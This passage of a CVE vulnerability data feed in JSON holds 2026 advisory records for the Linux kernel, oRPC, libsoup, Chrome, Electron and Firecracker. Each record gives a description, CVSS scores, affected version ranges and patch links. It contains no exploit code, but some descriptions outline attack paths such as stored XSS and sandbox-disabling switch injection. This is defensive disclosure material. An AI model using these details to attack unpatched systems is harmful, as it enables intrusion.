"}]}]}],"references":[{"url":"https://git.kernel.org/stable/c/18e9cf2259b4157fd282b323514375f2f6a59edb","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/2d8afee89262762fe0e5547772708c75f320c957","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/60382993a2e18041f88c7969f567f168cd3b4de3","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/695455fbc49053cbf555f2f302a5dcd600f412ff","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]}]}},{"cve":{"id":"CVE-2026-23253","sourceIdentifier":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","published":"2026-03-18T18:16:23.383","lastModified":"2026-06-01T14:08:30.670","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-core: fix wrong reinitialization of ringbuffer on reopen\n\ndvb_dvr_open() calls dvb_ringbuffer_init() when a new reader opens the\nDVR device.  dvb_ringbuffer_init() calls init_waitqueue_head(), which\nreinitializes the waitqueue list head to empty.\n\nSince dmxdev->dvr_buffer.queue is a shared waitqueue (all opens of the\nsame DVR device share it), this orphans any existing waitqueue entries\nfrom io_uring poll or epoll, leaving them with stale prev/next pointers\nwhile the list head is reset to {self, self}.\n\nThe waitqueue and spinlock in dvr_buffer are already properly\ninitialized once in dvb_dmxdev_init().  The open path only needs to\nreset the buffer data pointer, size, and read/write positions.\n\nReplace the dvb_ringbuffer_init() call in dvb_dvr_open() with direct\nassignment of data/size and a call to dvb_ringbuffer_reset(), which\nproperly resets pread, pwrite, and error with correct memory ordering\nwithout touching the waitqueue or spinlock."},{"lang":"es","value":"En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nmedia: dvb-core: corrige la reinicialización incorrecta del búfer circular al reabrir\n\ndvb_dvr_open() llama a dvb_ringbuffer_init() cuando un nuevo lector abre el dispositivo DVR. dvb_ringbuffer_init() llama a init_waitqueue_head(), lo que reinicializa la cabecera de la lista de la cola de espera a vacía.\n\nDado que dmxdev-&gt;dvr_buffer.queue es una cola de espera compartida (todas las aperturas del mismo dispositivo DVR la comparten), esto deja huérfanas las entradas existentes de la cola de espera de io_uring poll o epoll, dejándolas con punteros prev/next obsoletos mientras la cabecera de la lista se restablece a {self, self}.\n\nLa cola de espera y el spinlock en dvr_buffer ya están correctamente inicializados una vez en dvb_dmxdev_init(). La ruta de apertura solo necesita restablecer el puntero de datos del búfer, el tamaño y las posiciones de lectura/escritura.\n\nReemplace la llamada a dvb_ringbuffer_init() en dvb_dvr_open() con la asignación directa de datos/tamaño y una llamada a dvb_ringbuffer_reset(), que restablece correctamente pread, pwrite y error con el ordenamiento de memoria correcto sin tocar la cola de espera o el spinlock."}],"metrics":{"cvssMetricV31":[{"source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"2.6.17","versionEndExcluding":"5.10.253","matchCriteriaId":"CD6C2FEB-75E3-41E6-905C-667A819D083A"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"5.11","versionEndExcluding":"5.15.203","matchCriteriaId":"20DDB3E9-AABF-4107-ADB0-5362AA067045"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"5.16","versionEndExcluding":"6.1.167","matchCriteriaId":"2EDC6BAF-B710-4E26-B6AA-D68922EE7B43"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2","versionEndExcluding":"6.6.130","matchCriteriaId":"C57BB918-DF28-46B3-94F7-144176841267"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.7","versionEndExcluding":"6.12.77","matchCriteriaId":"B3D12E00-E42D-4056-B354-BAD4903C03A5"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.13","versionEndExcluding":"6.18.17","matchCriteriaId":"A5E006E4-59C7-43C1-9231-62A72219F2BA"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.19","versionEndExcluding":"6.19.7","matchCriteriaId":"69245D10-0B71-485E-80C3-A64F077004D3"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*","matchCriteriaId":"F253B622-8837-4245-BCE5-A7BF8FC76A16"}]}]}],"references":[{"url":"https://git.kernel.org/stable/c/32eb8e4adc207ef31bc6e5ae56bab940b0176066","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/527cfa8a3486b3555c5c15e2f62be484a11398dc","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/af050ab44fa1b1897a940d7d756e512232f5e5df","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/bfbc0b5b32a8f28ce284add619bf226716a59bc0","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/cfd94642025e6f71c8f754bdec0800ee95e4f3dd","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/d71781bad59b1c9d60d7068004581f9bf19c0c9d","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/f1e520ca2e83ece6731af6167c9e5e16931ecba0","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/fb378cf89be434ed1f10ab79cc4788fba8ae868d","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]}]}},{"cve":{"id":"CVE-2026-23254","sourceIdentifier":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","published":"2026-03-18T18:16:23.530","lastModified":"2026-06-01T14:10:37.893","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet: gro: fix outer network offset\n\nThe udp GRO complete stage assumes that all the packets inserted the RX\nhave the `encapsulation` flag zeroed. Such assumption is not true, as a\nfew H/W NICs can set such flag when H/W offloading the checksum for\nan UDP encapsulated traffic, the tun driver can inject GSO packets with\nUDP encapsulation and the problematic layout can also be created via\na veth based setup.\n\nDue to the above, in the problematic scenarios, udp4_gro_complete() uses\nthe wrong network offset (inner instead of outer) to compute the outer\nUDP header pseudo checksum, leading to csum validation errors later on\nin packet processing.\n\nAddress the issue always clearing the encapsulation flag at GRO completion\ntime. Such flag will be set again as needed for encapsulated packets by\nudp_gro_complete()."},{"lang":"es","value":"En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnet: gro: corregir desplazamiento de red externo\n\nLa etapa de completado de GRO de UDP asume que todos los paquetes insertados en el RX tienen el indicador 'encapsulation' puesto a cero. Dicha suposición no es cierta, ya que algunas NIC de H/W pueden establecer dicho indicador al descargar el checksum por H/W para un tráfico UDP encapsulado, el controlador tun puede inyectar paquetes GSO con encapsulación UDP y la disposición problemática también puede crearse a través de una configuración basada en veth.\n\nDebido a lo anterior, en los escenarios problemáticos, udp4_gro_complete() utiliza el desplazamiento de red incorrecto (interno en lugar de externo) para calcular el pseudo checksum del encabezado UDP externo, lo que lleva a errores de validación de csum más adelante en el procesamiento de paquetes.\n\nAbordar el problema siempre borrando el indicador de encapsulación en el momento de completado de GRO. Dicho indicador se establecerá de nuevo según sea necesario para paquetes encapsulados por udp_gro_complete()."}],"metrics":{"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":3.6}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.6.31","versionEndExcluding":"6.6.124","matchCriteriaId":"7227C1EF-FAE4-4A81-A334-1487EFCBF507"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.8.10","versionEndExcluding":"6.9","matchCriteriaId":"DD26A649-FB0B-4A7B-A16B-A9D27807D7E9"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.9.1","versionEndExcluding":"6.12.70","matchCriteriaId":"389604B3-C4AF-4558-AE99-65329C545794"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.13","versionEndExcluding":"6.18.10","matchCriteriaId":"7156C23F-009E-4D05-838C-A2DA417B5B8D"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.9:-:*:*:*:*:*:*","matchCriteriaId":"3F2A4A3D-068A-4CF2-A09F-9C7937DDB0A5"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.9:rc7:*:*:*:*:*:*","matchCriteriaId":"DAECDCD8-F556-4606-8D7B-5C6D47A501F2"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*","matchCriteriaId":"17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*","matchCriteriaId":"C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*","matchCriteriaId":"F71D92C0-C023-48BD-B3B6-70B638EEE298"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*","matchCriteriaId":"13580667-0A98-40CC-B29F-D12790B91BDB"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*","matchCriteriaId":"CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*","matchCriteriaId":"3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*","matchCriteriaId":"F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*","matchCriteriaId":"EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}],"references":[{"url":"https://git.kernel.org/stable/c/2e5edb69e5d0e23ef248c56fc977039268c77a7b","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/5c2c3c38be396257a6a2e55bd601a12bb9781507","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/9d40a85138568696387ef04cd004c64612a70874","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/b83557bc6f560433fe5d727e241069f8db5ba709","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]}]}},{"cve":{"id":"CVE-2026-33331","sourceIdentifier":"security-advisories@github.com","published":"2026-03-24T20:16:28.547","lastModified":"2026-06-01T12:21:12.373","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"oRPC is an tool that helps build APIs that are end-to-end type-safe and adhere to OpenAPI standards. Prior to version 1.13.9, a stored cross-site scripting (XSS) vulnerability exists in the OpenAPI documentation generation of orpc. If an attacker can control any field within the OpenAPI specification (such as info.description), they can break out of the JSON context and execute arbitrary JavaScript when a user views the generated API documentation. This issue has been patched in version 1.13.9."},{"lang":"es","value":"oRPC es una herramienta que ayuda a construir APIs que son de tipo seguro de extremo a extremo y se adhieren a los estándares de OpenAPI. Antes de la versión 1.13.9, existe una vulnerabilidad de cross-site scripting (XSS) almacenado en la generación de documentación de OpenAPI de oRPC. Si un atacante puede controlar cualquier campo dentro de la especificación de OpenAPI (como info.description), pueden salir del contexto JSON y ejecutar JavaScript arbitrario cuando un usuario ve la documentación de la API generada. Este problema ha sido parcheado en la versión 1.13.9."}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":4.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:orpc:orpc:*:*:*:*:*:*:*:*","versionEndExcluding":"1.13.9","matchCriteriaId":"137D3616-F542-4117-A6F1-D7A0E9C57A01"}]}]}],"references":[{"url":"https://github.com/middleapi/orpc/commit/4f0efa8a1d3fa8e8317a4b03cc3945a5dfd68add","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/middleapi/orpc/releases/tag/v1.13.9","source":"security-advisories@github.com","tags":["Product","Release Notes"]},{"url":"https://github.com/middleapi/orpc/security/advisories/GHSA-7f6v-3gx7-27q8","source":"security-advisories@github.com","tags":["Exploit","Mitigation","Vendor Advisory"]},{"url":"https://github.com/middleapi/orpc/security/advisories/GHSA-7f6v-3gx7-27q8","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Mitigation","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-5119","sourceIdentifier":"secalert@redhat.com","published":"2026-03-30T07:15:58.350","lastModified":"2026-06-01T13:16:33.290","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw was found in libsoup. When establishing HTTPS tunnels through a configured HTTP proxy, sensitive session cookies are transmitted in cleartext within the initial HTTP CONNECT request. A network-positioned attacker or a malicious HTTP proxy can intercept these cookies, leading to potential session hijacking or user impersonation."},{"lang":"es","value":"Se encontró una vulnerabilidad en libsoup. Al establecer túneles HTTPS a través de un proxy HTTP configurado, las cookies de sesión sensibles se transmiten en texto claro dentro de la solicitud HTTP CONNECT inicial. Un atacante posicionado en la red o un proxy HTTP malicioso puede interceptar estas cookies, lo que podría conducir al secuestro potencial de la sesión o a la suplantación de identidad del usuario."}],"metrics":{"cvssMetricV31":[{"source":"secalert@redhat.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":4.2},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":4.2}]},"weaknesses":[{"source":"secalert@redhat.com","type":"Secondary","description":[{"lang":"en","value":"CWE-319"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:gnome:libsoup:-:*:*:*:*:*:*:*","matchCriteriaId":"C5BAC4F4-3ACD-4F4D-920C-F920FD2C5472"},{"vulnerable":true,"criteria":"cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*","matchCriteriaId":"142AD0DD-4CF3-4D74-9442-459CE3347E3A"},{"vulnerable":true,"criteria":"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*","matchCriteriaId":"F4CFF558-3C47-480D-A2F0-BABF26042943"},{"vulnerable":true,"criteria":"cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*","matchCriteriaId":"7F6FB57C-2BC7-487C-96DD-132683AEB35D"},{"vulnerable":true,"criteria":"cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*","matchCriteriaId":"D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}],"references":[{"url":"https://access.redhat.com/errata/RHSA-2026:13978","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:14087","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:15968","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:17482","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:19143","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:19356","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:21686","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:22316","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/security/cve/CVE-2026-5119","source":"secalert@redhat.com","tags":["Mitigation","Vendor Advisory"]},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2452932","source":"secalert@redhat.com","tags":["Issue Tracking","Vendor Advisory"]},{"url":"https://gitlab.gnome.org/GNOME/libsoup/-/issues/502","source":"secalert@redhat.com","tags":["Exploit","Issue Tracking"]}]}},{"cve":{"id":"CVE-2026-5273","sourceIdentifier":"chrome-cve-admin@google.com","published":"2026-04-01T05:16:00.427","lastModified":"2026-06-01T12:21:23.610","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Use after free in CSS in Google Chrome prior to 146.0.7680.178 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)"}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":3.4}]},"weaknesses":[{"source":"chrome-cve-admin@google.com","type":"Secondary","description":[{"lang":"en","value":"CWE-416"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*","versionEndExcluding":"146.0.7680.177","matchCriteriaId":"55B0324F-7911-403B-8235-D71996B55DFB"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*","matchCriteriaId":"387021A0-AF36-463C-A605-32EA7DAC172E"},{"vulnerable":false,"criteria":"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*","matchCriteriaId":"703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"},{"vulnerable":false,"criteria":"cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*","matchCriteriaId":"A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}],"references":[{"url":"https://chromereleases.googleblog.com/2026/03/stable-channel-update-for-desktop_31.html","source":"chrome-cve-admin@google.com","tags":["Vendor Advisory"]},{"url":"https://issues.chromium.org/issues/493952652","source":"chrome-cve-admin@google.com","tags":["Issue Tracking","Permissions Required"]}]}},{"cve":{"id":"CVE-2026-34769","sourceIdentifier":"security-advisories@github.com","published":"2026-04-04T00:16:17.657","lastModified":"2026-06-01T12:21:31.787","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to versions 38.8.6, 39.8.0, 40.7.0, and 41.0.0-beta.8, an undocumented commandLineSwitches webPreference allowed arbitrary switches to be appended to the renderer process command line. Apps that construct webPreferences by spreading untrusted configuration objects may inadvertently allow an attacker to inject switches that disable renderer sandboxing or web security controls. Apps are only affected if they construct webPreferences from external or untrusted input without an allowlist. Apps that use a fixed, hardcoded webPreferences object are not affected. This issue has been patched in versions 38.8.6, 39.8.0, 40.7.0, and 41.0.0-beta.8."}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H","baseScore":7.7,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.0,"impactScore":6.0},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-88"},{"lang":"en","value":"CWE-912"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:*:*:*:*:*:node.js:*:*","versionEndExcluding":"38.8.6","matchCriteriaId":"9CE003A2-03CC-4355-AA17-2CBD204EC6C3"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:*:*:*:*:*:node.js:*:*","versionStartIncluding":"39.0.0","versionEndExcluding":"39.8.0","matchCriteriaId":"642CA6B2-000A-480D-B062-80593D150787"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:*:*:*:*:*:node.js:*:*","versionStartIncluding":"40.0.0","versionEndExcluding":"40.7.0","matchCriteriaId":"E54036E0-1D1F-4265-A2F3-B9C1F88F65ED"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:alpha1:*:*:*:node.js:*:*","matchCriteriaId":"A20225D6-F435-4D09-962D-B162F521B6AD"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:alpha2:*:*:*:node.js:*:*","matchCriteriaId":"33712802-EB60-4E9A-83B8-9F2320B70CB4"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:alpha3:*:*:*:node.js:*:*","matchCriteriaId":"9D0A9142-54FE-47BB-9FEB-5E97528E28FE"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:alpha4:*:*:*:node.js:*:*","matchCriteriaId":"9E1D191F-DEAE-4DB3-9822-F31AF9FE3BAC"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:alpha5:*:*:*:node.js:*:*","matchCriteriaId":"45A8192F-3D2C-4987-9BBE-7ECC3F71965D"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:alpha6:*:*:*:node.js:*:*","matchCriteriaId":"EEA1A2E5-03DB-46CB-8427-7F31A8A7CE1C"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta1:*:*:*:node.js:*:*","matchCriteriaId":"B2DFCE75-BD3F-4537-B5B8-14097E262EA2"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta2:*:*:*:node.js:*:*","matchCriteriaId":"BC346E25-EA43-4615-8CDB-16D15D46E4FF"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta3:*:*:*:node.js:*:*","matchCriteriaId":"FA5B3C00-CAFC-4995-BF35-9920F3039E77"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta4:*:*:*:node.js:*:*","matchCriteriaId":"3672F3FB-6B5E-40FD-8A92-CB4DD6BC6A93"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta5:*:*:*:node.js:*:*","matchCriteriaId":"9EE4F8AE-21D2-4815-85B7-B7ECCC0D5059"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta6:*:*:*:node.js:*:*","matchCriteriaId":"D195760C-7DD9-4259-9042-EDE65AEAC1D6"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta7:*:*:*:node.js:*:*","matchCriteriaId":"B370859F-24D3-4B25-B580-1A5B6DB94BFE"}]}]}],"references":[{"url":"https://github.com/electron/electron/security/advisories/GHSA-9wfr-w7mm-pc7f","source":"security-advisories@github.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-5747","sourceIdentifier":"ff89ba41-3aa1-4d27-914a-91399e9639e5","published":"2026-04-08T00:16:05.657","lastModified":"2026-06-01T12:52:52.287","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"An out-of-bounds write issue in the virtio PCI transport in Firecracker 1.13.0 through 1.14.3 and 1.15.0 on x86_64 and aarch64 might allow a local guest user with root privileges to crash the Firecracker VMM process or potentially execute arbitrary code on the host via modification of virtio queue configuration registers after device activation. Achieving code execution on the host requires additional preconditions, such as the use of a custom guest kernel or specific snapshot configurations.\n\nTo remediate this, users should upgrade to Firecracker 1.14.4 or 1.15.1 and later."}],"metrics":{"cvssMetricV40":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"HIGH","attackRequirements":"PRESENT","privilegesRequired":"HIGH","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"HIGH","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFI